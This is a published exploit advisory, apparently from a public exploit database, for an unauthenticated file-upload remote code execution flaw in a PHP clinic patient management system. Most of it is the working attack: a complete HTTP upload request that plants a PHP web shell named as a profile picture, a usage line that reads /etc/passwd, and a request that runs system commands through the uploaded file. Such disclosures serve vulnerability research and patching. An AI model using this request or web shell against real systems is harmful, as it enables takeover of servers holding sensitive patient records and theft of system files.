## https://sploitus.com/exploit?id=1337DAY-ID-39307
# Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE
# Exploit Author: Oğulcan Hami Gül
# Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code
# Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10
## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication.
POST /pms/users.php HTTP/1.1
Host: 192.168.1.36
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------421755697017784551042596452367
Content-Length: 1054
Origin: http://192.168.1.36
Connection: close
Referer: http://192.168.1.36/pms/users.php
Upgrade-Insecure-Requests: 1
-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="display_name"
sefa7
-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="user_name"
sefa7
-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="password"
sefa7
-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="profile_picture"; filename="simple-backdoor.php"
Content-Type: application/x-php
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="save_user"
-----------------------------421755697017784551042596452367--
## After the file upload request sent by attacker, Application adds a random number to the beginning of the file to be uploaded. Malicious file can be seen under the path /pms/users.php without any authentication.
## With the request http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami the attacker can execute arbitrary command on the application server.